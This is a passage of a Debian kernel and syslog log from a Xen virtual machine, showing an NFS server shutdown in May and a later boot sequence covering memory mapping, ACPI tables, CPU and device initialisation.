1104May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
1105May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1106May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
1107May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
1108May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1109May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1110May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1111May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1112May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1113May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
1114May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
1115May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
1116May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1117May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1118May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
1119May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
1120May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
1121May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1122May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
1123May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
1124May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
1125May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
1126May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
1127May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
1128May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
1129May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
1130May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
1131May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
1132May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
1133May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
1134May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
1135May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
1136May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
1137May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
1138May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
1139May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
1140May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
1141May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
1142May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
1143May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
1144May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
1145May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
1146May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
1147May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1148May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1149May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
1150May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
1151May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
1152May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
1153May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
1154May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1155May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
1156May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1157May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
1158May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
1159May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
1160May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
1161May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
1162May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
1163May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1164May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1165May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
1166May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
1167May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
1168May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
1169May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
1170May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
1171May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
1172May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
1173May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
1174May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1175May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
1176May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1177May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
1178May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1179May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1180May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1181May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1182Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1183Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1184Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1185Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1186Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1187Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1188Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1189Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1190Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1191Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1192Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1193Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1194Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1195Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1196Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1197Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1198Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1199Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1200Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1201Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1202Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1203Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1204Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1205Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1206Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1207Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1208Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1209Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1210Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1211Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1212Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1213Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1214Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1215Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1216Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1217Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1218Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1219Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1220Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1221Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1222Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1223Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1224Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1225Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1226Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1227Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1228Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1229Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1230Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1231Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1232Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1233Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1234Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1235Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1236Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1237Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1238Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1239Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1240Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1241Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1242Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1243Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1244Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1245Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1246Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1247Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1248Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1249Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1250Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1251Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1252Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1253Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1254Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1255Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1256Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1257Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1258Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1259Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1260Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1261Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1262Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1263Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1264Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1265Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1266Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1267Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1268Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1269Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1270Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1271Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1272Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1273Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1274Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1275Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1276Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1277Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1278Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1279Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1280Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1281Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1282Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1283Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1284Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1285Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1286Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1287Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1288Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1289Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1290Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1291Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1292Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1293Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1294Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1295Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1296Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1297Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1298Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1299Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1300Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1301Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1302Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1303Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1304Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1305Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1306Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1307Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1308Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1309Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1310Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1311Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1312Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1313Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1314Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1315Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1316Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1317Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1318Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1319Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1320Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1321Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1322Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1323Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1324Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1325Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1326Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1327Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1328Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1329Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1330Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1331Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1332Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1333Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1334Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1335Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1336Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1337Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1338Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1339Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1340Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1341Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1342Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1343Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1344Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1345Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1346Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1347Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1348Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1349Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1350Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1351Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1352Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1353Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1354Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1355Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1356Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1357Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1358Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1359Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1360Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1361Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1362Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1363Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1364Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1365Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1366Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1367Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1368Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1369Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1370Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1371Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1372Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1373Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1374Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1375Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1376Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1377Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1378Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1379Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1380Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1381Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1382Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1383Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1384Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1385Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1386Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
